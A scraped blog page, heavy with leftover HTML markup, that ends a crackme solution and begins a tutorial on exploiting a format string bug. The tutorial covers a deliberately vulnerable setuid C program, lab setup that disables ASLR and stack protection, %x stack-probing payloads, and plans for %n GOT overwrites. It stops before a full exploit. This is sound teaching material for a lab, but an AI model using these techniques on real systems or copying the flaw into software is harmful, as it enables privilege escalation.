class="o"!=/spanspan class="w" /spanspan class="n"input/spanspan class="p"[/spanspan class="mi"1/spanspan class="p"])/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"nope/spanspan class="p"();/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"if/spanspan class="w" /spanspan class="p"(/spanspan class="sc"#39;6#39;/spanspan class="w" /spanspan class="o"!=/spanspan class="w" /spanspan class="n"input/spanspan class="p"[/spanspan class="mi"0/spanspan class="p"])/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"nope/spanspan class="p"();/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"fflush/spanspan class="p"(/spanspan class="n"stdin/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"memset/spanspan class="p"(/spanspan class="n"converted/spanspan class="p",/spanspan class="w" /spanspan class="mi"0/spanspan class="p",/spanspan class="w" /spanspan class="k"sizeof/spanspan class="w" /spanspan class="n"converted/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"converted/spanspan class="p"[/spanspan class="mi"0/spanspan class="p"]/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="sc"#39;E#39;/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"check/spanspan class="p"[/spanspan class="mi"3/spanspan class="p"]/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="sc"#39;\0#39;/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"for/spanspan class="w" /spanspan class="p"(/spanspan class="n"i/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="mi"2/spanspan class="p",/spanspan class="w" /spanspan class="n"c/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="mi"1/spanspan class="p";/spanspan class="w" /spanspan class="n"strlen/spanspan class="p"(/spanspan class="n"converted/spanspan class="p")/spanspan class="w" /spanspan class="o"lt;/spanspan class="w" /spanspan class="mi"8/spanspan class="w" /spanspan class="o"amp;amp;/spanspan class="w" /spanspan class="n"i/spanspan class="w" /spanspan class="o"lt;/spanspan class="w" /spanspan class="n"strlen/spanspan class="p"(/spanspan class="n"input/spanspan class="p");/spanspan class="w" /spanspan class="n"i/spanspan class="w" /spanspan class="o"+=/spanspan class="w" /spanspan class="mi"3/spanspan class="p",/spanspan class="w" /spanspan class="n"c/spanspan class="o"++/spanspan class="p")/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"check/spanspan class="p"[/spanspan class="mi"0/spanspan class="p"]/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"input/spanspan class="p"[/spanspan class="n"i/spanspan class="p"];/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"check/spanspan class="p"[/spanspan class="mi"1/spanspan class="p"]/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"input/spanspan class="p"[/spanspan class="n"i/spanspan class="o"+/spanspan class="mi"1/spanspan class="p"];/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"check/spanspan class="p"[/spanspan class="mi"2/spanspan class="p"]/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"input/spanspan class="p"[/spanspan class="n"i/spanspan class="o"+/spanspan class="mi"2/spanspan class="p"];/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"converted/spanspan class="p"[/spanspan class="n"c/spanspan class="p"]/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"atoi/spanspan class="p"(/spanspan class="n"check/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"}/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"converted/spanspan class="p"[/spanspan class="n"c/spanspan class="p"]/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="sc"#39;\0#39;/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"if/spanspan class="w" /spanspan class="p"(/spanspan class="n"strcmp/spanspan class="p"(/spanspan class="n"converted/spanspan class="p",/spanspan class="w" /spanspan class="n"ANSWER/spanspan class="p")/spanspan class="w" /spanspan class="o"==/spanspan class="w" /spanspan class="mi"0/spanspan class="p")/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="s"quot;The Password translates into %s, quot;/spanspan class="p",/spanspan class="w" /spanspan class="n"converted/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"good/spanspan class="p"();/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"}/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"else/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"nope/spanspan class="p"();/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"return/spanspan class="w" /spanspan class="mi"0/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="p"}/spanspan class="w"/span/span span class="code-line"/code/pre/div /td/tr/table pThis works on both 64 bit and 32 bit systems. There are only 3 changes here, the size of the character array codeconverted/code on line 21 has increased to 9, meaning it now has the space to store the extra null terminator. The call to codememset/code to fill the array with null characters and lastly the explicit null terminator on line 40, it should already be null from the call to codememset/code but just incase./p pThat concludes this crackme solution. I hope you enjoyed it./p pHappy Hacking :-)/p

Plain Format String Vulnerability

20 May 2014 at 19:31
By: 0xe7
pThis is the second of a series of tutorials exploring how to detect and exploit stack based vulnerabilities on x86-32 Linux systems. The first can be found a href="/x86-32-linux/2014/05/08/plain-buffer-overflow/" target="_blank"here/a./p pThis tutorial will involve detecting and exploiting a a href="https://en.wikipedia.org/wiki/Printf_format_string" target="_blank"format string/a a href="https://en.wikipedia.org/wiki/Uncontrolled_format_string" target="_blank"vulnerability/a. Format string vulnerabilities are sometimes easier to find than a href="https://en.wikipedia.org/wiki/Buffer_overflow" target="_blank"buffer overflows/a but nearly always harder to exploit which is why I decided to do this tutorital after the buffer overflow./p pA format string vulnerability happens when a programmer has passed a user controlled input as part of the first argument of a call to one of the a href="http://linux.die.net/man/3/printf" target="_blank"printf family/a of functions./p !-- more -- pAll of the code in this tutorial was written by the author./p h2The Vulnerable App/h2 pBelow is the source code of the vulnerable application that we will be attacking. It is written in C and it the same application that is attacked in the first part of this series./p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/span span class="code-line"span class="normal"20/span/span span class="code-line"span class="normal"21/span/span span class="code-line"span class="normal"22/span/span span class="code-line"span class="normal"23/span/span span class="code-line"span class="normal"24/span/span span class="code-line"span class="normal"25/span/span span class="code-line"span class="normal"26/span/span span class="code-line"span class="normal"27/span/span span class="code-line"span class="normal"28/span/span span class="code-line"span class="normal"29/span/span span class="code-line"span class="normal"30/span/span span class="code-line"span class="normal"31/span/span span class="code-line"span class="normal"32/span/span span class="code-line"span class="normal"33/span/span span class="code-line"span class="normal"34/span/span span class="code-line"span class="normal"35/span/span span class="code-line"span class="normal"36/span/span span class="code-line"span class="normal"37/span/span span class="code-line"span class="normal"38/span/span span class="code-line"span class="normal"39/span/span span class="code-line"span class="normal"40/span/span span class="code-line"span class="normal"41/span/span span class="code-line"span class="normal"42/span/span span class="code-line"span class="normal"43/span/span span class="code-line"span class="normal"44/span/span span class="code-line"span class="normal"45/span/span span class="code-line"span class="normal"46/span/span span class="code-line"span class="normal"47/span/span span class="code-line"span class="normal"48/span/span span class="code-line"span class="normal"49/span/span span class="code-line"span class="normal"50/span/span span class="code-line"span class="normal"51/span/span span class="code-line"span class="normal"52/span/span span class="code-line"span class="normal"53/span/span span class="code-line"span class="normal"54/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;stdio.hgt;/spanspan class="cp"/span/span span class="code-line"span class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;string.hgt;/spanspan class="cp"/span/span span class="code-line"span class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;stdlib.hgt;/spanspan class="cp"/span/span span class="code-line"/span span class="code-line"span class="cp"#define PASS quot;topsecretpasswordquot;/span/span span class="code-line"/span span class="code-line"span class="cp"#define SFILE quot;secret.txtquot;/span/span span class="code-line"/span span class="code-line"span class="kt"int/spanspan class="w" /spanspan class="nf"checkpass/spanspan class="p"(/spanspan class="kt"char/spanspan class="w" /spanspan class="o"*/spanspan class="n"p/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="kt"void/spanspan class="w" /spanspan class="nf"printfile/spanspan class="p"();/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="kt"int/spanspan class="w" /spanspan class="nf"main/spanspan class="p"(/spanspan class="kt"int/spanspan class="w" /spanspan class="n"argc/spanspan class="p",/spanspan class="w" /spanspan class="kt"char/spanspan class="w" /spanspan class="o"**/spanspan class="n"argv/spanspan class="p")/spanspan class="w"/span/span span class="code-line"span class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"r/spanspan class="p";/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="k"if/spanspan class="w" /spanspan class="p"(/spanspan class="n"argc/spanspan class="w" /spanspan class="o"lt;/spanspan class="w" /spanspan class="mi"2/spanspan class="p")/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="s"quot;Usage: quot;/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="n"argv/spanspan class="p"[/spanspan class="mi"0/spanspan class="p"]);/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="s"quot; lt;passwordgt;/spanspan class="se"\n/spanspan class="s"quot;/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"exit/spanspan class="p"(/spanspan class="mi"1/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"}/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"r/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"checkpass/spanspan class="p"(/spanspan class="n"argv/spanspan class="p"[/spanspan class="mi"1/spanspan class="p"]);/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"if/spanspan class="w" /spanspan class="p"(/spanspan class="n"r/spanspan class="w" /spanspan class="o"!=/spanspan class="w" /spanspan class="mi"0/spanspan class="p")/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="s"quot;Wrong password: quot;/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="n"argv/spanspan class="p"[/spanspan class="mi"1/spanspan class="p"]);/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="s"quot;/spanspan class="se"\n/spanspan class="s"quot;/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"exit/spanspan class="p"(/spanspan class="mi"1/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"}/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printfile/spanspan class="p"();/spanspan class="w"/span/span span class="code-line"span class="p"}/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="kt"int/spanspan class="w" /spanspan class="nf"checkpass/spanspan class="p"(/spanspan class="kt"char/spanspan class="w" /spanspan class="o"*/spanspan class="n"a/spanspan class="p")/spanspan class="w"/span/span span class="code-line"span class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"char/spanspan class="w" /spanspan class="n"p/spanspan class="p"[/spanspan class="mi"512/spanspan class="p"];/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"r/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"strncpy/spanspan class="p"(/spanspan class="n"p/spanspan class="p",/spanspan class="w" /spanspan class="n"a/spanspan class="p",/spanspan class="w" /spanspan class="n"strlen/spanspan class="p"(/spanspan class="n"a/spanspan class="p")/spanspan class="o"+/spanspan class="mi"1/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"r/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"strcmp/spanspan class="p"(/spanspan class="n"p/spanspan class="p",/spanspan class="w" /spanspan class="n"PASS/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"return/spanspan class="w" /spanspan class="n"r/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="p"}/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="kt"void/spanspan class="w" /spanspan class="nf"printfile/spanspan class="p"()/spanspan class="w"/span/span span class="code-line"span class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"FILE/spanspan class="w" /spanspan class="o"*/spanspan class="n"f/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"c/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"f/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"fopen/spanspan class="p"(/spanspan class="n"SFILE/spanspan class="p",/spanspan class="w" /spanspan class="s"quot;rquot;/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"if/spanspan class="w" /spanspan class="p"(/spanspan class="n"f/spanspan class="p")/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"while/spanspan class="w" /spanspan class="p"((/spanspan class="n"c/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"getc/spanspan class="p"(/spanspan class="n"f/spanspan class="p"))/spanspan class="w" /spanspan class="o"!=/spanspan class="w" /spanspan class="n"EOF/spanspan class="p")/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"putchar/spanspan class="p"(/spanspan class="n"c/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"fclose/spanspan class="p"(/spanspan class="n"f/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"}/spanspan class="w" /spanspan class="k"else/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="s"quot;Error opening file: quot;/spanspan class="w" /spanspan class="n"SFILE/spanspan class="w" /spanspan class="s"quot;/spanspan class="se"\n/spanspan class="s"quot;/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"exit/spanspan class="p"(/spanspan class="mi"1/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"}/spanspan class="w"/span/span span class="code-line"span class="p"}/spanspan class="w"/span/span span class="code-line"/code/pre/div /td/tr/table h3The Fix/h3 pThere are 2 lines in the above application that contain a format string vulnerability. The first is on line 18, it is part of the usage message and should be changed to codeprintf("%s", argv[0]);/code. The second, and the vulnerability that we will be attacking here, is on line 25, this should be changed to codeprintf("%s", argv[1]);/code./p h2Setting Up The Environment/h2 pThe environment setup is exactly the same as in part 1, so if you done part 1 then skip this section. This is how to setup the environment in full on a Debian based system:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/span span class="code-line"span class="normal"20/span/span span class="code-line"span class="normal"21/span/span span class="code-line"span class="normal"22/span/span span class="code-line"span class="normal"23/span/span span class="code-line"span class="normal"24/span/span span class="code-line"span class="normal"25/span/span span class="code-line"span class="normal"26/span/span span class="code-line"span class="normal"27/span/span span class="code-line"span class="normal"28/span/span span class="code-line"span class="normal"29/span/span span class="code-line"span class="normal"30/span/span span class="code-line"span class="normal"31/span/span span class="code-line"span class="normal"32/span/span span class="code-line"span class="normal"33/span/span span class="code-line"span class="normal"34/span/span span class="code-line"span class="normal"35/span/span span class="code-line"span class="normal"36/span/span span class="code-line"span class="normal"37/span/span span class="code-line"span class="normal"38/span/span span class="code-line"span class="normal"39/span/span span class="code-line"span class="normal"40/span/span span class="code-line"span class="normal"41/span/span span class="code-line"span class="normal"42/span/span span class="code-line"span class="normal"43/span/span span class="code-line"span class="normal"44/span/span span class="code-line"span class="normal"45/span/span span class="code-line"span class="normal"46/span/span span class="code-line"span class="normal"47/span/span span class="code-line"span class="normal"48/span/span span class="code-line"span class="normal"49/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"[email protected]:~# /spanadduser testuser/span span class="code-line"span class="go"Adding user `testuser#39; .../span/span span class="code-line"span class="go"Adding new group `testuser#39; (1001) .../span/span span class="code-line"span class="go"Adding new user `testuser#39; (1001) with group `testuser#39; .../span/span span class="code-line"span class="go"Creating home directory `/home/testuser#39; .../span/span span class="code-line"span class="go"Copying files from `/etc/skel#39; .../span/span span class="code-line"span class="go"Enter new UNIX password: /span/span span class="code-line"span class="go"Retype new UNIX password: /span/span span class="code-line"span class="go"passwd: password updated successfully/span/span span class="code-line"span class="go"Changing the user information for testuser/span/span span class="code-line"span class="go"Enter the new value, or press ENTER for the default/span/span span class="code-line"span class="go" Full Name []: /span/span span class="code-line"span class="go" Room Number []: /span/span span class="code-line"span class="go" Work Phone []: /span/span span class="code-line"span class="go" Home Phone []: /span/span span class="code-line"span class="go" Other []: /span/span span class="code-line"span class="go"Is the information correct? [Y/n]/span/span span class="code-line"span class="gp"[email protected]:~# /spanls/span span class="code-line"span class="go"app.c/span/span span class="code-line"span class="gp"[email protected]:~# /spangcc -z execstack -fno-stack-protector -o app app.c/span span class="code-line"span class="gp"[email protected]:~# /spancp app /home/testuser//span span class="code-line"span class="gp"[email protected]:~# /spancat /proc/sys/kernel/randomize_va_space /span span class="code-line"span class="go"2/span/span span class="code-line"span class="gp"[email protected]:~# /spanspan class="nb"echo/span span class="m"0/span gt; /proc/sys/kernel/randomize_va_space/span span class="code-line"span class="gp"[email protected]:~# /spancat /proc/sys/kernel/randomize_va_space/span span class="code-line"span class="go"0/span/span span class="code-line"span class="gp"[email protected]:~# /spanspan class="nb"cd/span /home/testuser//span span class="code-line"span class="gp"[email protected]:/home/testuser# /spanls -l app/span span class="code-line"span class="go"-rwxr-xr-x 1 root root 6242 Apr 17 16:48 app/span/span span class="code-line"span class="gp"[email protected]:/home/testuser# /spanchmod u+s app/span span class="code-line"span class="gp"[email protected]:/home/testuser# /spanls -l app/span span class="code-line"span class="go"-rwsr-xr-x 1 root root 6242 Apr 17 16:48 app/span/span span class="code-line"span class="gp"[email protected]:/home/testuser# /spanspan class="nb"echo/span span class="err"#39;/spanThis is a top secret file!/span span class="code-line"span class="go"gt; Only people with the password should be able to view this file!#39; gt; secret.txt/span/span span class="code-line"span class="gp"[email protected]:/home/testuser# /spanls -l secret.txt/span span class="code-line"span class="go"-rw-r--r-- 1 root root 91 May 9 13:40 secret.txt/span/span span class="code-line"span class="gp"[email protected]:/home/testuser# /spanchmod span class="m"600/span secret.txt/span span class="code-line"span class="gp"[email protected]:/home/testuser# /spanls -l secret.txt/span span class="code-line"span class="go"-rw------- 1 root root 91 May 9 13:40 secret.txt/span/span span class="code-line"span class="gp"[email protected]:/home/testuser# /spancat secret.txt/span span class="code-line"span class="go"This is a top secret file!/span/span span class="code-line"span class="go"Only people with the password should be able to view this file!/span/span span class="code-line"span class="gp"[email protected]:/home/testuser# /spansu - testuser/span span class="code-line"span class="gp"[email protected]:~$ /spanls -l app/span span class="code-line"span class="go"-rwsr-xr-x 1 root root 6242 Apr 17 16:48 app/span/span span class="code-line"span class="gp"[email protected]:~$ /spanls -l secret.txt /span span class="code-line"span class="go"-rw------- 1 root root 91 May 9 13:40 secret.txt/span/span span class="code-line"span class="gp"[email protected]:~$ /spancat secret.txt/span span class="code-line"span class="go"cat: secret.txt: Permission denied/span/span span class="code-line"/code/pre/div /td/tr/table h2Testing The App / Finding The Vulnerability/h2 pFor this application its very easy to find this vulnerability:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/span span class="code-line"span class="normal"4/span/span span class="code-line"span class="normal"5/span/span span class="code-line"span class="normal"6/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"[email protected]:~$ /span./app/span span class="code-line"span class="go"Usage: ./app lt;passwordgt;/span/span span class="code-line"span class="gp"[email protected]:~$ /span./app span class="nb"test/span/span span class="code-line"span class="go"Wrong password: test/span/span span class="code-line"span class="gp"[email protected]:~$ ./app %/spanx/span span class="code-line"span class="go"Wrong password: bffff884/span/span span class="code-line"/code/pre/div /td/tr/table pWhat's happened here is we've instructed printf to get the first value off of the stack and print it in hex. From the output we have got its clear there is a format string vulnerability here. A properly coded application would give the following result:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"[email protected]:~$ ./app %/spanx/span span class="code-line"span class="go"Wrong password: %x/span/span span class="code-line"/code/pre/div /td/tr/table h2Developing The Exploit/h2 pNow that we have discovered the vulnerability, we need to find a part of the stack that we control:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"[email protected]:~$ /span./app span class="s2"quot;AAAA : %xquot;/span/span span class="code-line"span class="go"Wrong password: AAAA : bffff874/span/span span class="code-line"span class="gp"[email protected]:~$ /span./app span class="s2"quot;AAAA : %2\$xquot;/span/span span class="code-line"span class="go"Wrong password: AAAA : bffff880/span/span span class="code-line"span class="gp"[email protected]:~$ /span./app span class="s2"quot;AAAA : %3\$xquot;/span/span span class="code-line"span class="go"Wrong password: AAAA : bffff7c8/span/span span class="code-line"span class="gp"[email protected]:~$ /span./app span class="s2"quot;AAAA : %4\$xquot;/span/span span class="code-line"span class="go"Wrong password: AAAA : b7e8d7f5/span/span span class="code-line"span class="gp"[email protected]:~$ /span./app span class="s2"quot;AAAA : %5\$xquot;/span/span span class="code-line"span class="go"Wrong password: AAAA : b7ff0590/span/span span class="code-line"/code/pre/div /td/tr/table pWe need to do this until we find 41414141 (AAAA in hex), this can take some time so I do a little shell-fu to make this less of a painful task:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/span span class="code-line"span class="normal"4/span/span span class="code-line"span class="normal"5/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"[email protected]:~$ /spanspan class="k"for/span i span class="k"in/span span class="sb"`/spanseq span class="m"1/span span class="m"500/spanspan class="sb"`/spanspan class="p";/span span class="k"do/span span class="nb"echo/span span class="s2"quot;./app \quot;AAAA : %/spanspan class="nv"$i/spanspan class="s2"\$x\quot;quot;/span gt;gt; /tmp/tspan class="p";/span ./app span class="s2"quot;AAAA : %/spanspan class="nv"$i/spanspan class="s2"\$xquot;/span gt;gt; /tmp/tspan class="p";/span span class="k"done/span/span span class="code-line"span class="gp"[email protected]:~$ /spangrep -B span class="m"1/span span class="m"41414141/span /tmp/t/span span class="code-line"span class="gp"[email protected]:~$ /spangrep -B span class="m"1/span span class="m"414141/span /tmp/t/span span class="code-line"span class="go"./app quot;AAAA : %123$xquot;/span/span span class="code-line"span class="go"Wrong password: AAAA : 41414100/span/span span class="code-line"/code/pre/div /td/tr/table pSo we know roughly where we are going to land, this will change a bit as we go further but it will always be around here. Now to all these A's together in 4 bytes:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"[email protected]:~$ /span./app span class="s2"quot;AAAAC : %123\$xquot;/span/span span class="code-line"span class="go"Wrong password: AAAAC : 41414141/span/span span class="code-line"/code/pre/div /td/tr/table pWe are going to need 2 addresses though (you will find out why later), so lets add some B's and find both of them:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/span span class="code-line"span class="normal"4/span/span span class="code-line"span class="normal"5/span/span span class="code-line"span class="normal"6/span/span span class="code-line"span class="normal"7/span/span span class="code-line"span class="normal"8/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"[email protected]:~$ /span./app span class="s2"quot;AAAABBBBC : %123\$x : %124\$xquot;/span/span span class="code-line"span class="go"Wrong password: AAAABBBBC : 41007070 : 42414141/span/span span class="code-line"span class="gp"[email protected]:~$ /span./app span class="s2"quot;AAAABBBBCC : %123\$x : %124\$xquot;/span/span span class="code-line"span class="go"Wrong password: AAAABBBBCC : 41410070 : 42424141/span/span span class="code-line"span class="gp"[email protected]:~$ /span./app span class="s2"quot;AAAABBBB : %123\$x : %124\$xquot;/span/span span class="code-line"span class="go"Wrong password: AAAABBBB : 707061 : 41414141/span/span span class="code-line"span class="gp"[email protected]:~$ /span./app span class="s2"quot;AAAABBBB : %124\$x : %125\$xquot;/span/span span class="code-line"span class="go"Wrong password: AAAABBBB : 41414141 : 42424242/span/span span class="code-line"/code/pre/div /td/tr/table pSo now we control 2 4 byte addresses (the positions still might change a little along the way but we will always need to correct this using methods like this). So far we have just used the code%x/code conversion specifier, most implementations also provide the code%n/code conversion specifier too. This is what is needed to actually write to memory locations using this vulnerability. code%n/code writes however many bytes has been printed so far to the address pointed to by the value on the stack, so with this knowledge and being able to control what addresses are at a certain point in memory, we should be able to run our own code. Still a little bit of work to do but we are getting there./p pNext we need figure out the memory address that we want to write to, for this we'll use the global offset table (GOT) (this is a table used to call functions from shared libraries, like printf, putchar, strlen..., it contains pointers to the functions and is writable on linux)./p pFirst let's look at the disassembly to see what function we need to write to:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/span span class="code-line"span class="normal"20/span/span span class="code-line"span class="normal"21/span/span span class="code-line"span class="normal"22/span/span span class="code-line"span class="normal"23/span/span span class="code-line"span class="normal"24/span/span span class="code-line"span class="normal"25/span/span span class="code-line"span class="normal"26/span/span span class="code-line"span class="normal"27/span/span span class="code-line"span class="normal"28/span/span span class="code-line"span class="normal"29/span/span span class="code-line"span class="normal"30/span/span span class="code-line"span class="normal"31/span/span span class="code-line"span class="normal"32/span/span span class="code-line"span class="normal"33/span/span span class="code-line"span class="normal"34/span/span span class="code-line"span class="normal"35/span/span span class="code-line"span class="normal"36/span/span span class="code-line"span class="normal"37/span/span span class="code-line"span class="normal"38/span/span span class="code-line"span class="normal"39/span/span span class="code-line"span class="normal"40/span/span span class="code-line"span class="normal"41/span/span span class="code-line"span class="normal"42/span/span span class="code-line"span class="normal"43/span/span span class="code-line"span class="normal"44/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"[email protected]:~$ /spangdb -q 